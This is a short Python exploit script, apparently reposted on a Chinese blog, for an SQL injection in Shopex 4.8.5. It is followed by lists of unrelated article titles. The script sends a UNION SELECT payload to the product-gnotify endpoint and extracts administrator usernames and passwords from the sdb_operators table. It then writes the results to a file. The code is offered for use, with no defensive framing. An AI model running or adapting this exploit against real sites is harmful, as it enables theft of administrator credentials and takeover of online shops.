# -*- coding:utf-8 -*
#Author:MXi4oyu
#Email:798033502@qq.com
#Shopex 4.8.5 SQL Injection Exp
#转载请说明来路，谢谢合作
import httplib2
from urllib import urlencode
import re
import time

outfile=open('result.txt','a+')
def Exp(url):
    url=url+'/?product-gnotify'
    #定义要提交的数据
    html='1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1'
    data={"goods[goods_id]":'3',"goods[product_id]":html}
    h = httplib2.Http('.cache')
    response,content = h.request(url, 'POST', urlencode(data),
                                 headers={'Content-Type': 'application/x-www-form-urlencoded'})
    gre=re.compile('\$\^(.+)?\^\$')
    s=content
    pwd=gre.findall(s)[0]
    outfile.write(url+"\n"+pwd+"\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n")

if __name__=='__main__':
    Exp('http://www.xxx.com/')

最新文章

1. CARP
2. treeMap and treeSet
3. [译]Python编写虚拟解释器
4. ajax中向HTML页面中指定位置添加信息
5. TweenMax动画库学习(五)
6. Java SSL/TLS Socket实现
7. hdu 5424 Rikka with Graph II(dfs+哈密顿路径)
8. USACO Arithmetic Progressions 【构造等差数列】
9. A. Night at the Museum Round#376 (Div. 2)
10. MySQL DROP TABLE操作以及 DROP 大表时的注意事项【转】
11. NODE中解决跨域请求的问题
12. ES5新增数组方法every()、some()、filter()、map()
13. 2019.01.10 bzoj1095: [ZJOI2007]Hide 捉迷藏（动态点分治）
14. php解析mpp文件中的资源
15. UVa 508 Morse Mismatches （模糊暴力）
16. Hadoop案例（四）倒排索引（多job串联)与全局计数器
17. php 实现Iterator 接口
18. Javascript 香港身份证号校验
19. C语言 内存分配 地址 指针 数组 参数 实例解析
20. JavaWeb Filter

热门文章

1. [置顶] think in java interview-高级开发人员面试宝典(八)
2. Swift - 禁用UIWebView和WKWebView的下拉拖动效果
3. MySQL存储引擎：InnoDB和MyISAM的差别/优劣评价/评测/性能测试
4. 事务管理在三层架构中应用以及使用ThreadLocal再次重构
5. linux安装Eclipse c++环境
6. 某公司ASP.NET应聘上机试题
7. asp.net ajax 检测用户名是否可用代码
8. 7个基于Linux命令行的文件下载和网站浏览工具
9. android程序中使用命令行及获得命令行执行后的内容
10. 很好用的一个类：TJvAppXMLFileStorage